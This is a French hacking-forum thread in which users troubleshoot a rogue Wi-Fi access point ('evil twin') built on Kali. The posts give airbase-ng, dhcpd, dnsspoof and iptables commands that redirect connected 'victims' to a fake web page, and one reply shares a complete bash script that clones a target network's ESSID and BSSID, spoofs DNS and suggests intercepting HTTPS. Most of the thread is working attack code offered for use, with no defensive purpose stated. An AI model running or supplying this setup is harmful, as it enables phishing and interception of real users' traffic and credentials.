Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 02-04-2014 12:47:51

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Rogue AP local: Victime Andriod ou Windows quelle différence?

bonjour,
après des tests sous kali, j'ai mis en place un rogue AP local
1. j'ai téléchargé dhcp-server3
2. exécuter ça:
****************************************
airmon-ng start wlan0
airbase-ng -e TEST -c 11 mon0
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1800
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward

rm /etc/dhcp3/dhcpd.conf

cat > /etc/dhcp3/dhcpd.conf << EOF
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name-servers 10.0.0.1;
range 10.0.0.20 10.0.0.50;
}
EOF

dhcpd -d -f -cf /etc/dhcp3/dhcpd.conf at0
echo "10.0.0.1 *.* *" > /tmp/dns-spoof
dnsspoof -i at0 -f /tmp/dns-spoof
iptables -t nat -A PREROUTING -i at0 -j REDIRECT
***********************************************
j'ai bien placé la page index.php dans var/www/, puis j'ai donné les droit d’accès :  chmod 777 /var/www/*

le problème:
lorsque je me connecte au rogue AP via tablette au téléphone Andriod, la connexion passe très bien et je tombe facilement dans la page index.php. mais je perd la connexion chaque 1 minute
et lorsque je me connecte avec Windows7 sera très difficile de se connecter au rogue AP "windows n'a pas pu se connecter....", mais après plusieurs tentatives je peux me connecter et je tombe dans la page index.php.

questions:
pourquoi avec Windows je rencontre des problèmes de connexion?
pourquoi avec andriod je perde la connexion  environs chaque 1 minute et puis reconnexion

données:
rogue AP monté avec Kali + Alfa036h
distance entre Rogue AP et les deux victimes "andriod+win7" environs 3 mètres.
merci

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 02-04-2014 18:13:29

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Rogue AP local: Victime Andriod ou Windows quelle différence?

Salut,


il y a plusieurs chose que je ne comprends pas dans ta conf:

1 ifconfig at0 mtu 1800   (pourquoi 1800? attention l'augmentation du MTU peut s'avérer néfaste avec certaine carte)

2 je vois pas la ligne iptable qui redirige le traffic sur l'ip local contenant le serveur de la fake page

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80

3 rm /etc/dhcp3/dhcpd.conf  (Pourquoi supprimer ton fichier conf?)

4 C'est cadeau smile

option T150 code 150 = string;
deny client-updates;
one-lease-per-client false;
allow bootp;
ddns-updates off;
ddns-update-style interim;
authoritative;

subnet 10.0.0.0 netmask 255.255.255.0 {
interface at0;
range 10.0.0.2 10.0.0.10;
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name-servers 10.0.0.1;
allow unknown-clients;
}

Dernière modification par koala (02-04-2014 18:14:32)

Hors Ligne

#3 02-04-2014 20:09:17

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Rogue AP local: Victime Andriod ou Windows quelle différence?

koala, j'ai pas compris le cadeau lol
c'est une configuration de dhcp?

Hors Ligne

#4 05-04-2014 23:05:34

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Rogue AP local: Victime Andriod ou Windows quelle différence?

mes amis le problème persisite,
avec cette configuration, mon rogue Ap n'est pas stable, y'a de l'apparition de réseau RogueAP, puis disparition, sa tourne comme ça toute la journée,
y'a t'il un probléme de carte ou de configuration.?

Hors Ligne

#5 05-04-2014 23:23:52

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Rogue AP local: Victime Andriod ou Windows quelle différence?

Une rogueAP ne s'envole pas si tu laisse airbase tourner... et a moins que tu ai un driver foireux genre intel ou broadcom est compagnie je vois pas trop comment on peut t'aider si tu nous apporte pas des éléments pratique, (invite de commande screenchoot etc...)

Hors Ligne

#6 06-04-2014 09:31:20

InconnuX
Membre
Inscription : 17-03-2014
Messages : 21

Re : Rogue AP local: Victime Andriod ou Windows quelle différence?

Voici celui que j'utilise sous Kali wink
Désolé mais j'ai perdu le nom de l'auteur original du script...

#!/bin/bash
VERT="\\033[1;32m"
BLANC="\\033[0;39m"
ROUGE="\\033[1;31m"

error() {
echo -e "$ROUGE""An error occurred during $1"
echo -e "Rogue AP script will stop""$BLANC"
exit 1
}

taskDone() {
echo -e "$VERT""Done""$BLANC"
}

echo -en "Stop Apache... "
service apache2 stop
taskDone

echo -en "Killing NetworkManager... "
pkill NetworkManager
taskDone
echo -en "Killing DHCP... "
pkill dhclient
taskDone
echo -en "Killing wpa_supplicant... "
pkill wpa_supplicant
taskDone
echo -en "Killing Airbase-ng... "
pkill airbase-ng
taskDone

echo -en "Stop mon0... "
airmon-ng stop mon0 >/dev/null 2>&1
taskDone

#Configure isc-dhcp-server
echo -en "Write /etc/default/isc-dhcp-server... "
cat >/etc/default/isc-dhcp-server <<EOF
INTERFACES="at0"
EOF
taskDone

echo -en "Write /etc/dhcp/dhcpd.conf... "
cat >/etc/dhcp/dhcpd.conf <<EOF
ddns-update-style interim;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.1.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 198.168.1.255;
option routers 192.168.1.254;
option domain-name-servers 8.8.8.8;
range 192.168.1.1 192.168.1.253;
}
EOF
taskDone

echo -en "Start Apache... "
service apache2 start
taskDone

echo -e "Putting Wlan In Monitor Mode... "
if airmon-ng stop wlan0 1>/dev/null; then # Change to your wlan interface
echo -en "    Wlan0 stop... "
taskDone
if airmon-ng start wlan0 1>/dev/null; then # Change to your wlan interface
echo -en "    Wlan0 start... "
taskDone
else
error "starting wlan0"
fi
else
error "stopping wlan0"
fi

echo -en "Starting Fake AP... "
xterm -hold -e airbase-ng -c BOX_CHANNEL -e BOX_ESSID -a BOX_BSSID -v mon0 >/dev/null 2>&1 &
sleep 5;
taskDone

echo -en "Starting at0... "
ifconfig at0 up
ifconfig at0 192.168.1.254 netmask 255.255.255.0
taskDone

echo -en "Configure route... "
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.254
taskDone

echo -en "Configure iptables"

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp -j DNAT --to 8.8.8.8
taskDone

echo -en "Reset DHCP lease..."
echo > '/var/lib/dhcp/dhcpd.leases'
taskDone

echo -en "Start DHCP on at0... "
xterm -hold -e dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0 >/dev/null 2>&1 &
sleep 5;
taskDone

echo -en "Activate Ip Forwarding... "
echo "1" > /proc/sys/net/ipv4/ip_forward
taskDone

xterm -hold -e dnsspoof -i at0 -f /root/Desktop/dns.txt &> /dev/null &
sleep 2 

Il faut créer un fichier dns.txt à mettre dans le même répertoire que le script avec ceci dedans :

192.168.1.254 *.*

Si tu veux rediriger le https sur ton serveur Apache, il faut activer le module qui gère le SSL et créer un certificat pour ton serveur.

Tout est ici :
http://doc.ubuntu-fr.org/tutoriel/secur … 2_avec_ssl

Hors Ligne

#7 06-04-2014 12:27:47

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Rogue AP local: Victime Andriod ou Windows quelle différence?

koala,  les invite de commande sont dans discution N#01
inconnux, je vais essayer cette configuration.

PS, je travail avec alfa 036H
encore merci vous les DEUX.

Hors Ligne

#8 06-04-2014 21:25:37

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Rogue AP local: Victime Andriod ou Windows quelle différence?

j'ai pu localiser le problème de deconnexion de rogue AP
quand je lance une rogue AP ça marche bien une fois le KALI passe on mode veille, ici commence les problémes, la carte de désactive, la preuve quand mis fin au mode veille et je lance WICID pour scaner les réseau, j'aurai aucan réseau sur wicid

c'est solution pensez vous?

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
106 2110 28-11-2016 19:42:10 par koala
35 1727 23-11-2016 16:31:33 par roofnat
16 1033 17-11-2016 12:22:00 par disquette
10 416 11-11-2016 22:11:03 par koala
[ Projet Rogue AP ] par shirocen
16 444 19-10-2016 05:14:45 par shirocen

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.026 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]